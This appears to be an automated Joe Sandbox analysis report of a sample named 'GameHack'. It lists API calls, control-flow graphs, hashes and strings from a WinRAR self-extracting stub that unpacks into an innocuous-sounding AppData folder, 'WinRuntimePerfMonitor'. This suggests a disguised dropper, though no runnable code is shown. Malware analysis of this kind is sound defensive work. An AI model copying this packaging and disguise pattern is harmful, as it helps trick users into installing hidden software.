23255 edb66c 2 API calls 23254->23255 23256 eda1c6 23255->23256 23256->23253 23257 eda1ca GetFileAttributesW 23256->23257 23257->23253 23258->23242 23259->23244 23260->23240 23262 ed3ff4 ___scrt_initialize_default_local_stdio_options 23261->23262 23265 ef5759 23262->23265 23268 ef3837 23265->23268 23269 ef385f 23268->23269 23270 ef3877 23268->23270 23292 ef895a 20 API calls __dosmaperr 23269->23292 23270->23269 23272 ef387f 23270->23272 23294 ef3dd6 23272->23294 23273 ef3864 23293 ef8839 26 API calls _abort 23273->23293 23277 ef386f 23285 eeec4a 23277->23285 23280 ef3907 23303 ef4186 51 API calls 3 library calls 23280->23303 23281 ed3ffe 23281->23019 23284 ef3912 23304 ef3e59 20 API calls _free 23284->23304 23286 eeec55 IsProcessorFeaturePresent 23285->23286 23287 eeec53 23285->23287 23289 eef267 23286->23289 23287->23281 23305 eef22b SetUnhandledExceptionFilter 
UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23289->23305 23291 eef34a 23291->23281 23292->23273 23293->23277 23295 ef388f 23294->23295 23296 ef3df3 23294->23296 23302 ef3da1 20 API calls 2 library calls 23295->23302 23296->23295 23306 ef8fa5 GetLastError 23296->23306 23298 ef3e14 23326 ef90fa 38 API calls __fassign 23298->23326 23300 ef3e2d 23327 ef9127 38 API calls __fassign 23300->23327 23302->23280 23303->23284 23304->23277 23305->23291 23307 ef8fbb 23306->23307 23308 ef8fc1 23306->23308 23328 efa61b 11 API calls 2 library calls 23307->23328 23312 ef9010 SetLastError 23308->23312 23329 ef85a9 23308->23329 23312->23298 23313 ef8fdb 23336 ef84de 23313->23336 23316 ef8ff0 23316->23313 23318 ef8ff7 23316->23318 23317 ef8fe1 23319 ef901c SetLastError 23317->23319 23343 ef8e16 20 API calls __dosmaperr 23318->23343 23344 ef8566 38 API calls _abort 23319->23344 23321 ef9002 23323 ef84de _free 20 API calls 23321->23323 23325 ef9009 23323->23325 23325->23312 23325->23319 23326->23300 23327->23295 23328->23308 23334 ef85b6 __dosmaperr 23329->23334 23330 ef85f6 23346 ef895a 20 API calls __dosmaperr 23330->23346 23331 ef85e1 RtlAllocateHeap 23332 ef85f4 23331->23332 23331->23334 23332->23313 23342 efa671 11 API calls 2 library calls 23332->23342 23334->23330 23334->23331 23345 ef71ad 7 API calls 2 library calls 23334->23345 23337 ef84e9 RtlFreeHeap 23336->23337 23338 ef8512 __dosmaperr 23336->23338 23337->23338 23339 ef84fe 23337->23339 23338->23317 23347 ef895a 20 API calls __dosmaperr 23339->23347 23341 ef8504 GetLastError 23341->23338 23342->23316 23343->23321 23345->23334 23346->23332 23347->23341 23349 ed9820 23348->23349 23352 ed9824 23348->23352 23349->23102 23352->23349 23359 eda12d 23352->23359 23354 ed96dc 23353->23354 23355 ed96fa 23353->23355 23354->23355 23357 ed96e8 CloseHandle 23354->23357 23356 ed9719 23355->23356 23367 ed6e3e 74 API calls 23355->23367 23356->23102 23357->23355 23360 eee360 23359->23360 23361 eda13a DeleteFileW 23360->23361 
23362 eda14d 23361->23362 23363 ed984c 23361->23363 23364 edb66c 2 API calls 23362->23364 23363->23102 23365 eda161 23364->23365 23365->23363 23366 eda165 DeleteFileW 23365->23366 23366->23363 23367->23356 23374 edd28a 23368->23374 23371 edddfc SetDlgItemTextW 23371->23113 23372 edde22 LoadStringW 23372->23371 23373 edde39 LoadStringW 23372->23373 23373->23371 23379 edd1c3 23374->23379 23376 edd2a7 23377 edd2bc 23376->23377 23387 edd2c8 26 API calls 23376->23387 23377->23371 23377->23372 23380 edd1de 23379->23380 23386 edd1d7 _strncpy 23379->23386 23382 edd202 23380->23382 23388 ee1596 WideCharToMultiByte 23380->23388 23385 edd233 23382->23385 23389 eddd6b 50 API calls __vsnprintf 23382->23389 23390 ef58d9 26 API calls 3 library calls 23385->23390 23386->23376 23387->23377 23388->23382 23389->23385 23390->23386 23392 eeaa40 23391->23392 23393 eeaaf3 ExpandEnvironmentStringsW 23392->23393 23394 eeab16 23392->23394 23393->23394 23394->23117 23395->23117 23396->23117 23397->23138 23398->23117 23399->23117 23400->23117 23402 ef8606 23401->23402 23403 ef861e 23402->23403 23404 ef8613 23402->23404 23406 ef8626 23403->23406 23412 ef862f __dosmaperr 23403->23412 23414 ef8518 23404->23414 23409 ef84de _free 20 API calls 23406->23409 23407 ef8659 HeapReAlloc 23411 ef861b 23407->23411 23407->23412 23408 ef8634 23421 ef895a 20 API calls __dosmaperr 23408->23421 23409->23411 23411->23117 23412->23407 23412->23408 23422 ef71ad 7 API calls 2 library calls 23412->23422 23415 ef8556 23414->23415 23419 ef8526 __dosmaperr 23414->23419 23424 ef895a 20 API calls __dosmaperr 23415->23424 23416 ef8541 RtlAllocateHeap 23418 ef8554 23416->23418 23416->23419 23418->23411 23419->23415 23419->23416 23423 ef71ad 7 API calls 2 library calls 23419->23423 23421->23411 23422->23412 23423->23419 23424->23418 23426 edfeba 23425->23426 23454 ed1789 23426->23454 23428 edfed2 23428->23142 23430 edfead 23429->23430 23431 ed1789 76 API calls 23430->23431 23432 edfed2 23431->23432 23432->23144 23434 
ed7c72 __EH_prolog 23433->23434 23471 edc827 23434->23471 23436 ed7c8d 23477 eee24a 23436->23477 23438 ed7cb7 23483 ee440b 23438->23483 23441 ed7ddf 23442 ed7de9 23441->23442 23447 ed7e53 23442->23447 23515 eda4c6 23442->23515 23444 ed7f06 23444->23148 23445 ed7ec4 23445->23444 23521 ed6dc1 74 API calls 23445->23521 23447->23445 23449 eda4c6 8 API calls 23447->23449 23493 ed837f 23447->23493 23449->23447 23451 ed7d09 23450->23451 23453 ed7d10 23450->23453 23452 ee1acf 84 API calls 23451->23452 23452->23453 23455 ed179f 23454->23455 23466 ed17fa __vsnwprintf_l 23454->23466 23456 ed17c8 23455->23456 23467 ed6e91 74 API calls __vswprintf_c_l 23455->23467 23458 ed1827 23456->23458 23459 ed17e7 new 23456->23459 23461 ef35de 22 API calls 23458->23461 23459->23466 23469 ed6efd 75 API calls 23459->23469 23460 ed17be 23468 ed6efd 75 API calls 23460->23468 23463 ed182e 23461->23463 23463->23466 23470 ed6efd 75 API calls 23463->23470 23466->23428 23467->23460 23468->23456 23469->23466 23470->23466 23472 edc831 __EH_prolog 23471->23472 23473 eee24a new 8 API calls 23472->23473 23474 edc874 23473->23474 23475 eee24a new 8 API calls 23474->23475 23476 edc898 23475->23476 23476->23436 23480 eee24f new 23477->23480 23478 eee27b 23478->23438 23480->23478 23489 ef71ad 7 API calls 2 library calls 23480->23489 23490 eeecce RaiseException __CxxThrowException@8 new 23480->23490 23491 eeecb1 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 23480->23491 23484 ee4415 __EH_prolog 23483->23484 23485 eee24a new 8 API calls 23484->23485 23486 ee4431 23485->23486 23487 ed7ce6 23486->23487 23492 ee06ba 78 API calls 23486->23492 23487->23441 23489->23480 23492->23487 23494 ed8389 __EH_prolog 23493->23494 23522 ed1380 23494->23522 23496 ed83a4 23530 ed9ef7 23496->23530 23502 ed83d3 23653 ed1631 23502->23653 23503 ed846e 23549 ed8517 23503->23549 23506 ed84ce 23556 ed1f00 23506->23556 23510 ed83cf 23510->23502 23510->23503 23512 eda4c6 8 API calls 23510->23512 23657 edbac4 
CompareStringW 23510->23657 23511 ed84d9 23511->23502 23560 ed3aac 23511->23560 23570 ed857b 23511->23570 23512->23510 23516 eda4db 23515->23516 23520 eda4df 23516->23520 23911 eda5f4 23516->23911 23518 eda4ef 23519 eda4f4 FindClose 23518->23519 23518->23520 23519->23520 23520->23442 23521->23444 23523 ed1385 __EH_prolog 23522->23523 23524 edc827 8 API calls 23523->23524 23525 ed13bd 23524->23525 23526 eee24a new 8 API calls 23525->23526 23529 ed1416 ___scrt_get_show_window_mode 23525->23529 23527 ed1403 23526->23527 23527->23529 23658 edb07d 23527->23658 23529->23496 23531 ed9f0e 23530->23531 23532 ed83ba 23531->23532 23674 ed6f5d 76 API calls 23531->23674 23532->23502 23534 ed19a6 23532->23534 23535 ed19b0 __EH_prolog 23534->23535 23538 ed1a00 23535->23538 23547 ed19e5 23535->23547 23675 ed709d 23535->23675 23537 ed1b50 23678 ed6dc1 74 API calls 23537->23678 23538->23537 23541 ed1b60 23538->23541 23538->23547 23540 ed3aac 97 API calls 23542 ed1bb3 23540->23542 23541->23540 23541->23547 23543 ed1bff 23542->23543 23545 ed3aac 97 API calls 23542->23545 23543->23547 23548 ed1c32 23543->23548 23679 ed6dc1 74 API calls 23543->23679 23545->23542 23546 ed3aac 97 API calls 23546->23548 23547->23510 23548->23546 23548->23547 23550 ed8524 23549->23550 23697 ee0c26 GetSystemTime SystemTimeToFileTime 23550->23697 23552 ed8488 23552->23506 23553 ee1359 23552->23553 23699 eed51a 23553->23699 23557 ed1f05 __EH_prolog 23556->23557 23558 ed1f39 23557->23558 23707 ed1951 23557->23707 23558->23511 23561 ed3abc 23560->23561 23562 ed3ab8 23560->23562 23563 ed3ae9 23561->23563 23564 ed3af7 23561->23564 23562->23511 23565 ed3b29 23563->23565 23841 ed3281 85 API calls 3 library calls 23563->23841 23842 ed27e8 97 API calls 3 library calls 23564->23842 23565->23511 23568 ed3af5 23568->23565 23843 ed204e 74 API calls 23568->23843 23571 ed8585 __EH_prolog 23570->23571 23572 ed85be 23571->23572 23580 ed85c2 23571->23580 23866 ee84bd 99 API calls 23571->23866 23573 ed85e7 23572->23573 23576 

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00EE00CF: GetModuleHandleW.KERNEL32(kernel32), ref: 00EE00E4
                                        • Part of subcall function 00EE00CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00EE00F6
                                        • Part of subcall function 00EE00CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00EE0127
                                        • Part of subcall function 00EE9DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00EE9DAC
                                        • Part of subcall function 00EEA335: OleInitialize.OLE32(00000000), ref: 00EEA34E
                                        • Part of subcall function 00EEA335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00EEA385
                                        • Part of subcall function 00EEA335: SHGetMalloc.SHELL32(00F18430), ref: 00EEA38F
                                        • Part of subcall function 00EE13B3: GetCPInfo.KERNEL32(00000000,?), ref: 00EE13C4
                                        • Part of subcall function 00EE13B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 00EE13D8
                                      • GetCommandLineW.KERNEL32 ref: 00EED61C
                                      • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00EED643
                                      • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00EED654
                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 00EED68E
                                        • Part of subcall function 00EED287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00EED29D
                                        • Part of subcall function 00EED287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00EED2D9
                                      • CloseHandle.KERNEL32(00000000), ref: 00EED697
                                      • GetModuleFileNameW.KERNEL32(00000000,00F2DC90,00000800), ref: 00EED6B2
                                      • SetEnvironmentVariableW.KERNEL32(sfxname,00F2DC90), ref: 00EED6BE
                                      • GetLocalTime.KERNEL32(?), ref: 00EED6C9
                                      • _swprintf.LIBCMT ref: 00EED708
                                      • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00EED71A
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00EED721
                                      • LoadIconW.USER32(00000000,00000064), ref: 00EED738
                                      • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 00EED789
                                      • Sleep.KERNEL32(?), ref: 00EED7B7
                                      • DeleteObject.GDI32 ref: 00EED7F0
                                      • DeleteObject.GDI32(?), ref: 00EED800
                                      • CloseHandle.KERNEL32 ref: 00EED843
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                      • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                      • API String ID: 788466649-2753588727
                                      • Opcode ID: dad913b341d9472ea5713545244385add40d22a16c5a8d8d17c4f114348c18ac
                                      • Instruction ID: 6d460ee9860bb24ed84b3846a2dce44803441ada5d8b4b18b575109e0c3337aa
                                      • Opcode Fuzzy Hash: dad913b341d9472ea5713545244385add40d22a16c5a8d8d17c4f114348c18ac
                                      • Instruction Fuzzy Hash: C061E57190438DAFD320AFA2EC49F6A37ECBB48744F005429F545E22A1DFB4D945EB62

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 966 eda5f4-eda61f call eee360 969 eda691-eda69a FindNextFileW 966->969 970 eda621-eda632 FindFirstFileW 966->970 971 eda69c-eda6aa GetLastError 969->971 972 eda6b0-eda6b2 969->972 973 eda6b8-eda75c call edfe56 call edbcfb call ee0e19 * 3 970->973 974 eda638-eda64f call edb66c 970->974 971->972 972->973 975 eda761-eda774 972->975 973->975 981 eda66a-eda673 GetLastError 974->981 982 eda651-eda668 FindFirstFileW 974->982 984 eda675-eda678 981->984 985 eda684 981->985 982->973 982->981 984->985 987 eda67a-eda67d 984->987 988 eda686-eda68c 985->988 987->985 990 eda67f-eda682 987->990 988->975 990->988
                                      APIs
                                      • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00EDA4EF,000000FF,?,?), ref: 00EDA628
                                      • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00EDA4EF,000000FF,?,?), ref: 00EDA65E
                                      • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00EDA4EF,000000FF,?,?), ref: 00EDA66A
                                      • FindNextFileW.KERNEL32(?,?,?,?,?,?,00EDA4EF,000000FF,?,?), ref: 00EDA692
                                      • GetLastError.KERNEL32(?,?,?,?,00EDA4EF,000000FF,?,?), ref: 00EDA69E
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: FileFind$ErrorFirstLast$Next
                                      • String ID:
                                      • API String ID: 869497890-0
                                      • Opcode ID: 06d65dfdd5d700108792a2d5dfd573e0e74a7705cecbba3745dbcd5d95c8a358
                                      • Instruction ID: 6115f5700755fc5e554217e2068ab0c8e396ef11c8987c211138366c149676cf
                                      • Opcode Fuzzy Hash: 06d65dfdd5d700108792a2d5dfd573e0e74a7705cecbba3745dbcd5d95c8a358
                                      • Instruction Fuzzy Hash: 5E417371504245EFC720EF78C884ADAF7E8FB48344F08092AF5A9E3250D774AA558B52
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,?,00EF7513,00000000,00F0BAD8,0000000C,00EF766A,00000000,00000002,00000000), ref: 00EF755E
                                      • TerminateProcess.KERNEL32(00000000,?,00EF7513,00000000,00F0BAD8,0000000C,00EF766A,00000000,00000002,00000000), ref: 00EF7565
                                      • ExitProcess.KERNEL32 ref: 00EF7577
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: df44bd0d3be4c9629b5b22512e14ecd4c778756f246d8472e81bc6fb3a4fa1b9
                                      • Instruction ID: 3c117ede05d7ad70315928cd8fd8fd2fe9d1b27a8e98d961ded20223a18042b8
                                      • Opcode Fuzzy Hash: df44bd0d3be4c9629b5b22512e14ecd4c778756f246d8472e81bc6fb3a4fa1b9
                                      • Instruction Fuzzy Hash: CCE0B63110564CABDF11AF64DD09A693B69FB44785F109424FA49AA222CB35DE42DA90
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: H_prolog_memcmp
                                      • String ID:
                                      • API String ID: 3004599000-0
                                      • Opcode ID: 7f28d2e72eee07ffcdf1be3a46dd194c5c7ed9b7a77079d77a57d4a1c7fb3682
                                      • Instruction ID: 8b4a1cd7e1c8d93940072f26fa8361f35061c6294f04cdca185a8cd88b2cf6b3
                                      • Opcode Fuzzy Hash: 7f28d2e72eee07ffcdf1be3a46dd194c5c7ed9b7a77079d77a57d4a1c7fb3682
                                      • Instruction Fuzzy Hash: 37821970904245AEDF25DB60C985BFAB7B9EF05304F0861BBE859BB383DB315A46CB50
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00EEAEE5
                                        • Part of subcall function 00ED130B: GetDlgItem.USER32(00000000,00003021), ref: 00ED134F
                                        • Part of subcall function 00ED130B: SetWindowTextW.USER32(00000000,00F035B4), ref: 00ED1365
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: H_prologItemTextWindow
                                      • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                      • API String ID: 810644672-2179422497
                                      • Opcode ID: b2d6c5b2dff85ce516a5a6da6e70777b4669ddf0ba9ff94fdf881d0290dc36db
                                      • Instruction ID: b3ff98b4d47dde0ecf89531fd150214d3ccf45ab4047ea984f5671af0b595bf7
                                      • Opcode Fuzzy Hash: b2d6c5b2dff85ce516a5a6da6e70777b4669ddf0ba9ff94fdf881d0290dc36db
                                      • Instruction Fuzzy Hash: 1C4204B094429CBEEB21ABA19D8AFFF37BDEB01744F006155F601B61E1CB744945EB22

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 257 ee00cf-ee00ee call eee360 GetModuleHandleW 260 ee0154-ee03b2 257->260 261 ee00f0-ee0107 GetProcAddress 257->261 262 ee03b8-ee03c3 call ef70dd 260->262 263 ee0484-ee04b3 GetModuleFileNameW call edbc85 call edfe56 260->263 264 ee0109-ee011f 261->264 265 ee0121-ee0131 GetProcAddress 261->265 262->263 274 ee03c9-ee03fa GetModuleFileNameW CreateFileW 262->274 279 ee04b5-ee04bf call edacf5 263->279 264->265 265->260 266 ee0133-ee0152 265->266 266->260 276 ee03fc-ee040a SetFilePointer 274->276 277 ee0478-ee047f CloseHandle 274->277 276->277 280 ee040c-ee0429 ReadFile 276->280 277->263 286 ee04cc 279->286 287 ee04c1-ee04c5 call ee0085 279->287 280->277 282 ee042b-ee0450 280->282 283 ee046d-ee0476 call edfbd8 282->283 283->277 294 ee0452-ee046c call ee0085 283->294 289 ee04ce-ee04d0 286->289 291 ee04ca 287->291 292 ee04f2-ee0518 call edbcfb GetFileAttributesW 289->292 293 ee04d2-ee04f0 CompareStringW 289->293 291->289 296 ee051a-ee051e 292->296 301 ee0522 292->301 293->292 293->296 294->283 296->279 300 ee0520 296->300 302 ee0526-ee0528 300->302 301->302 303 ee052a 302->303 304 ee0560-ee0562 302->304 307 ee052c-ee0552 call edbcfb GetFileAttributesW 303->307 305 ee066f-ee0679 304->305 306 ee0568-ee057f call edbccf call edacf5 304->306 317 ee05e7-ee061a call ed400a AllocConsole 306->317 318 ee0581-ee05e2 call ee0085 * 2 call edddd1 call ed400a call edddd1 call ee9f35 306->318 312 ee055c 307->312 313 ee0554-ee0558 307->313 312->304 313->307 315 ee055a 313->315 315->304 323 ee061c-ee0661 GetCurrentProcessId AttachConsole call ef35b3 GetStdHandle WriteConsoleW Sleep FreeConsole 317->323 324 ee0667-ee0669 ExitProcess 317->324 318->324 323->324
                                      APIs
                                      • GetModuleHandleW.KERNEL32(kernel32), ref: 00EE00E4
                                      • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00EE00F6
                                      • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00EE0127
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00EE03D4
                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EE03F0
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EE0402
                                      • ReadFile.KERNEL32(00000000,?,00007FFE,00F03BA4,00000000), ref: 00EE0421
                                      • CloseHandle.KERNEL32(00000000), ref: 00EE0479
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00EE048F
                                      • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00EE04E7
                                      • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00EE0510
                                      • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00EE054A
                                        • Part of subcall function 00EE0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00EE00A0
                                        • Part of subcall function 00EE0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00EDEB86,Crypt32.dll,00000000,00EDEC0A,?,?,00EDEBEC,?,?,?), ref: 00EE00C2
                                      • _swprintf.LIBCMT ref: 00EE05BE
                                      • _swprintf.LIBCMT ref: 00EE060A
                                        • Part of subcall function 00ED400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00ED401D
                                      • AllocConsole.KERNEL32 ref: 00EE0612
                                      • GetCurrentProcessId.KERNEL32 ref: 00EE061C
                                      • AttachConsole.KERNEL32(00000000), ref: 00EE0623
                                      • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00EE0649
                                      • WriteConsoleW.KERNEL32(00000000), ref: 00EE0650
                                      • Sleep.KERNEL32(00002710), ref: 00EE065B
                                      • FreeConsole.KERNEL32 ref: 00EE0661
                                      • ExitProcess.KERNEL32 ref: 00EE0669
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                      • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                      • API String ID: 1201351596-3298887752
                                      • Opcode ID: 541a9cc66c4431133e46d1f2f1b73fdc4dcd2872976111bb764fc3ce3d94b034
                                      • Instruction ID: 65cbb365689c9cd500c5183cf518a46c2bdb327e96ddfa0e7e1fb830dbe1151b
                                      • Opcode Fuzzy Hash: 541a9cc66c4431133e46d1f2f1b73fdc4dcd2872976111bb764fc3ce3d94b034
                                      • Instruction Fuzzy Hash: CED173B11093889BD731DF51D849B9FBAECFB84708F00591DF685A6281D7B09648BB62

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 406 eebdf5-eebe0d call eee28c call eee360 411 eebe13-eebe3d call eeaa36 406->411 412 eeca90-eeca9d 406->412 411->412 415 eebe43-eebe48 411->415 416 eebe49-eebe57 415->416 417 eebe58-eebe6d call eea6c7 416->417 420 eebe6f 417->420 421 eebe71-eebe86 call ee17ac 420->421 424 eebe88-eebe8c 421->424 425 eebe93-eebe96 421->425 424->421 426 eebe8e 424->426 427 eeca5c-eeca87 call eeaa36 425->427 428 eebe9c 425->428 426->427 427->416 442 eeca8d-eeca8f 427->442 430 eec074-eec076 428->430 431 eec115-eec117 428->431 432 eec132-eec134 428->432 433 eebea3-eebea6 428->433 430->427 435 eec07c-eec088 430->435 431->427 438 eec11d-eec12d SetWindowTextW 431->438 432->427 434 eec13a-eec141 432->434 433->427 437 eebeac-eebf06 call ee9da4 call edb965 call eda49d call eda5d7 call ed70bf 433->437 434->427 439 eec147-eec160 434->439 440 eec09c-eec0a1 435->440 441 eec08a-eec09b call ef7168 435->441 497 eec045-eec05a call eda52a 437->497 438->427 444 eec168-eec176 call ef35b3 439->444 445 eec162 439->445 448 eec0ab-eec0b6 call eeab9a 440->448 449 eec0a3-eec0a9 440->449 441->440 442->412 444->427 461 eec17c-eec185 444->461 445->444 453 eec0bb-eec0bd 448->453 449->453 458 eec0bf-eec0c6 call ef35b3 453->458 459 eec0c8-eec0e8 call ef35b3 call ef35de 453->459 458->459 480 eec0ea-eec0f1 459->480 481 eec101-eec103 459->481 465 eec1ae-eec1b1 461->465 466 eec187-eec18b 461->466 472 eec296-eec2a4 call edfe56 465->472 473 eec1b7-eec1ba 465->473 466->465 470 eec18d-eec195 466->470 470->427 476 eec19b-eec1a9 call edfe56 470->476 489 eec2a6-eec2ba call ef17cb 472->489 478 eec1bc-eec1c1 